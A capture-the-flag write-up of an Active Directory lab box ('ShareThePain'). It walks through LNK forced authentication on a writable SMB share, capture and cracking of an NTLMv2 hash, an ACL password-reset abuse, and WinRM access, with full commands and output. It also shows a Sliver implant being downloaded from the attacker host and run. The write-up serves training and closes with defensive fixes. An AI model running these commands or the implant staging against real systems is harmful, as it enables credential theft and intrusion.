Box: Active Directory (Hack Smarter / OSCP-style) · OS: Windows Server 2022 · Domain: hack.smarter · Theme: Writable share → forced-auth (LNK) → crack → ACL abuse → internal pivot

ShareThePain lives up to its name — the whole box pivots on a writable SMB share that the domain controller itself browses, which lets you coerce authentication and steal a hash without any starting credentials. From there it’s the familiar Hack-Smarter AD rhythm: crack, map with BloodHound, abuse an ACL, and land the user flag — before the trail turns inward toward a local-only SQL service.

Recon

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShareThePain]
└─$ rustscan -a 10.1.185.142 -- -A
Open 10.1.185.142:53
Open 10.1.185.142:88
Open 10.1.185.142:135
Open 10.1.185.142:139
Open 10.1.185.142:389
Open 10.1.185.142:445
Open 10.1.185.142:464
Open 10.1.185.142:593
Open 10.1.185.142:636
Open 10.1.185.142:3268
Open 10.1.185.142:3269
Open 10.1.185.142:3389
Open 10.1.185.142:5985
Open 10.1.185.142:9389

A textbook domain-controller footprint — DNS, Kerberos, LDAP, SMB, WinRM, ADWS. The certs named the domain hack.smarter and host DC01. Into /etc/hosts.

SMB Enumeration — the writable share

A null session was permitted, so I listed shares straight away:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShareThePain]
└─$ nxc smb 10.1.185.142 -u '' -p '' --shares
SMB   10.1.185.142  445  DC01  [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:hack.smarter) (signing:True) (SMBv1:None) (Null Auth:True)
SMB   10.1.185.142  445  DC01  [+] hack.smarter\:
SMB   10.1.185.142  445  DC01  Share       Permissions   Remark
SMB   10.1.185.142  445  DC01  -----       -----------   ------
SMB   10.1.185.142  445  DC01  ADMIN$                    Remote Admin
SMB   10.1.185.142  445  DC01  C$                        Default share
SMB   10.1.185.142  445  DC01  IPC$                      Remote IPC
SMB   10.1.185.142  445  DC01  NETLOGON                  Logon server share
SMB   10.1.185.142  445  DC01  Share       READ,WRITE
SMB   10.1.185.142  445  DC01  SYSVOL                    Logon server share

Among the defaults sat a custom share simply called Share — with READ,WRITE for everyone. On a box named ShareThePain, that’s not subtle. Note SMB signing is enabled (signing:True), so relaying is off the table — but capturing and cracking is not.

Forced Authentication — LNK poisoning

A writable share that privileged users (or the DC) browse is a classic forced-authentication setup. I planted a malicious shortcut on it with netexec’s slinky module:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShareThePain]
└─$ nxc smb 10.1.185.142 -u 'guest' -p '' -M slinky -o SERVER=10.200.64.188 SHARES=Share NAME=systemd
SLINKY  10.1.185.142  445  DC01  [+] Found writable share: Share
SLINKY  10.1.185.142  445  DC01  [+] Created LNK file on the Share share

Then stood up Responder to catch the callback:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShareThePain]
└─$ sudo responder -I tun0 -v
[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 10.1.185.142
[SMB] NTLMv2-SSP Username : HACK\bob.ross
[SMB] NTLMv2-SSP Hash     : bob.ross::HACK:e8c2599969a1cb3d:F9BBDB3A7D25A2228A5BBBC53D3AF2E8:0101000000000000...

Almost immediately, Responder logged repeated NTLMv2 authentications from HACK\bob.ross — the share was being auto-rendered, and the shortcut’s icon path forced the DC to authenticate to me.

Cracking → bob.ross

I saved the captured NetNTLMv2 hash and cracked it with hashcat mode 5600:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShareThePain]
└─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
BOB.ROSS::HACK:e8c2599969a1cb3d:f9bbdb3a7d25a2228a5bbbc53d3af2e8:0101...:137Password123!@#
Hash.Mode........: 5600 (NetNTLMv2)

Creds: BOB.ROSS : 137Password123!@#.

Foothold & Enumeration

The creds validated over SMB, and I ran a full BloodHound collection to find a path forward:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShareThePain]
└─$ nxc smb 10.1.185.142 -u 'BOB.ROSS' -p '137Password123!@#'
SMB   10.1.185.142  445  DC01  [+] hack.smarter\BOB.ROSS:137Password123!@#

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShareThePain]
└─$ nxc ldap 10.1.185.142 -u 'BOB.ROSS' -p '137Password123!@#' --bloodhound --collection All --dns-server 10.1.185.142
LDAP  10.1.185.142  389  DC01  [+] hack.smarter\BOB.ROSS:137Password123!@#

ACL Abuse → alice.wonderland

BloodHound revealed that BOB.ROSS could reset the password of ALICE.WONDERLAND. One net rpc command later, that account was mine:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShareThePain]
└─$ net rpc password "ALICE.WONDERLAND" "cyber@123" -U "HACK.SMARTER"/"BOB.ROSS"%'137Password123!@#' -S 10.1.185.142

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShareThePain]
└─$ nxc smb 10.1.185.142 -u 'ALICE.WONDERLAND' -p 'cyber@123'
SMB   10.1.185.142  445  DC01  [+] hack.smarter\ALICE.WONDERLAND:cyber@123

User Flag

alice.wonderland had WinRM access:

┌──(kali@kali)-[~/Desktop/Hack Smarter/ShareThePain]
└─$ evil-winrm -i HACK.SMARTER -u 'ALICE.WONDERLAND' -p 'cyber@123'
*Evil-WinRM* PS C:\Users\alice.wonderland\Desktop> dir
    Directory: C:\Users\alice.wonderland\Desktop
-a----          9/3/2025   2:07 PM             54 user.txt
*Evil-WinRM* PS C:\Users\alice.wonderland\Desktop> type user.txt
bWFkZV9pdF90aGlzX2Zhcgo=      # base64 -d -> made_it_this_far

Lateral Movement — toward the internal SQL service

Enumerating listeners from the alice.wonderland shell turned up something not exposed externally — MSSQL bound to localhost:

*Evil-WinRM* PS C:\Users\alice.wonderland\Desktop> netstat -ano | findstr LISTENING
  TCP    127.0.0.1:1433         0.0.0.0:0              LISTENING       4260

*Evil-WinRM* PS C:\Users\alice.wonderland\Desktop> Get-Process -Id 4260
    829      57   367884     246416    4260   0 sqlservr

A local-only service means the next move is to pivot through this host to reach it. I generated a Sliver mTLS implant for the tunnel and staged it over a quick HTTP server:

[127.0.0.1] sliver > generate --mtls 10.200.64.188:443 --os windows --format exe pivot.exe
[*] Generating new windows/amd64 implant binary
[*] Symbol obfuscation is enabled
[*] Build completed in 1m36s
[*] Implant saved to .../ADVISORY_GRATITUDE.exe
*Evil-WinRM* PS C:\Users\alice.wonderland\Desktop> wget http://10.200.64.188:8000/ADVISORY_GRATITUDE.exe -O ADVISORY_GRATITUDE.exe
*Evil-WinRM* PS C:\Users\alice.wonderland\Desktop> ./ADVISORY_GRATITUDE.exe

Privilege Escalation — root

(This run’s notes stop at the pivot implant.) With a foothold session established, the next step is to tunnel into 127.0.0.1:1433 and attack the local MSSQL instance — authenticating and abusing its service context to escalate toward Administrator/root. I’ll complete this section once I’ve captured the MSSQL path.

Takeaways

  • Writable shares are forced-auth traps. No creds needed — write access plus a browsing victim (here, the DC itself) equals a stolen NTLMv2 hash.
  • Signing on, but it didn’t matter. SMB signing blocks relaying, but it does nothing to stop capturing and cracking a weak password offline.
  • BloodHound turns a low-priv user into a path. The bob.ross → alice.wonderland reset right is invisible by hand and obvious in the graph.
  • Localhost services are the next frontier. An internally-bound MSSQL instance is only reachable after a foothold — pivoting is the escalation.
  • Defensive fixes: remove write access from shares users don’t need it on, disable LLMNR/NBT-NS to kill Responder, enforce strong passwords, and tighten dangerous reset ACLs.